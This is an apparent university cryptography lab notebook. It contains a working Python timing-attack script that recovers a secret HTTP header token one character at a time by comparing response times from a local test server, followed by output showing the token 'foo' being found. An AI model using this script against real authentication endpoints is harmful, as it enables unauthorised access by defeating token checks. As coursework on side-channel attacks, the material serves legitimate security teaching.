In [10]:
'''
UNIVERSIDAD DEL VALLE DE GUATEMALA
CIFRADO DE INFORMACION
LABORATORIO 3
Grupo 3 ->
Amado Garcia
Sara Zavala
Ricardo Valenzuela
Andree Toledo
Juan Fernando de Leon
'''
#Referencia del codigo
#https://github.com/sqreen/DevelopersSecurityBestPractices/blob/master/_practices/timing-attack/_python/hack.py

import sys
import time
import string
import statistics

import requests

from operator import itemgetter

URL = "http://127.0.0.1:5000"
N = 100
TOKEN_SIZE = 3


class PasswordFound(Exception):

    def __init__(self, password):
        self.password = password


def try_to_hack(characters):
    timings = []

    # Print a . without a newline
    print('.', end='', flush=True)

    # Do N HTTP calls
    for i in range(N):
        before = time.perf_counter()
        result = requests.get(URL, headers={'X-TOKEN': characters})
        after = time.perf_counter()

        if result.status_code == 200:
            raise PasswordFound(characters)
        elif result.status_code != 403:
            raise Exception(result, result.status_code)

        timings.append(after - before)

    return timings


def find_next_character(base):
    measures = []

    print("Trying to find the character at position %s with prefix %r" % ((len(base) + 1), base))
    for i, character in enumerate(string.ascii_lowercase):
        timings = try_to_hack(base + character + "0" * (TOKEN_SIZE - len(base) - 1))

        median = statistics.median(timings)
        min_timing = min(timings)
        max_timing = max(timings)
        stddev = statistics.stdev(timings)

        measures.append({'character': character, 'median': median, 'min': min_timing,
                         'max': max_timing, 'stddev': stddev})

    sorted_measures = list(sorted(measures, key=itemgetter('median'), reverse=True))

    found_character = sorted_measures[0]
    top_characters = sorted_measures[1:4]

    print("Found character at position %s: %r" % ((len(base) + 1), found_character['character']))
    msg = "Median: %s Max: %s Min: %s Stddev: %s"
    print(msg % (found_character['median'], found_character['max'], found_character['min'], found_character['stddev']))

    print()
    print("Following characters were:")

    for top_character in top_characters:
        ratio = int((1 - (top_character['median'] / found_character['median'])) * 100)
        msg ="Character: %r Median: %s Max: %s Min: %s Stddev: %s (%d%% slower)"
        print(msg % (top_character['character'], top_character['median'], top_character['max'], top_character['min'], top_character['stddev'], ratio))

    return found_character['character']


def main():
    # Do a first request to start the keep-alive connection
    requests.get(URL)
    base = ''

    try:
        while len(base) != TOKEN_SIZE:
            next_character = find_next_character(base)
            base += next_character
            print("\n\n", end="")
    except PasswordFound as e:
        print("\n\n", end="")
        print("The token is: %r %s" % (e.password, '!'*10))
        sys.exit(0)
    else:
        print("The password is not found, check the allowed character and token size")
        sys.exit(1)


if __name__ == '__main__':
    main()

Trying to find the character at position 1 with prefix ''
..........................Found character at position 1: 'f'
Median: 0.01754450249995898 Max: 0.018621014000018477 Min: 0.014189505000103964 Stddev: 0.0009723341498246589

Following characters were:
Character: 'y' Median: 0.0027561755000533594 Max: 0.004979898999863508 Min: 0.0023557580002488976 Stddev: 0.000514128784845055 (84% slower)
Character: 'x' Median: 0.002518367499988017 Max: 0.003142722999655234 Min: 0.0023013400000309048 Stddev: 0.00016976893550884638 (85% slower)
Character: 'w' Median: 0.0024674600001617364 Max: 0.0030986619999566756 Min: 0.0022082240002418985 Stddev: 0.00018951409930964005 (85% slower)


Trying to find the character at position 2 with prefix 'f'
..........................Found character at position 2: 'o'
Median: 0.028706443999908515 Max: 0.030844805000015185 Min: 0.023829047000162973 Stddev: 0.0013856599699530897

Following characters were:
Character: 'z' Median: 0.017513743500103374 Max: 0.0233518

ERROR:root:Internal Python error in the inspect module.
Below is the traceback from this internal error.





The token is: 'foo' !!!!!!!!!!
Traceback (most recent call last):
  File "<ipython-input-10-de218c482980>", line 99, in main
    next_character = find_next_character(base)
  File "<ipython-input-10-de218c482980>", line 62, in find_next_character
    timings = try_to_hack(base + character + "0" * (TOKEN_SIZE - len(base) - 1))
  File "<ipython-input-10-de218c482980>", line 48, in try_to_hack
    raise PasswordFound(characters)
PasswordFound: foo

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/Users/amado-developer/opt/anaconda3/lib/python3.8/site-packages/IPython/core/interactiveshell.py", line 3343, in run_code
    exec(code_obj, self.user_global_ns, self.user_ns)
  File "<ipython-input-10-de218c482980>", line 112, in <module>
    main()
  File "<ipython-input-10-de218c482980>", line 105, in main
    sys.exit(0)
SystemExit: 0

During handling of the above exception, another exception occurred:

Traceback (most recent ca

TypeError: object of type 'NoneType' has no len()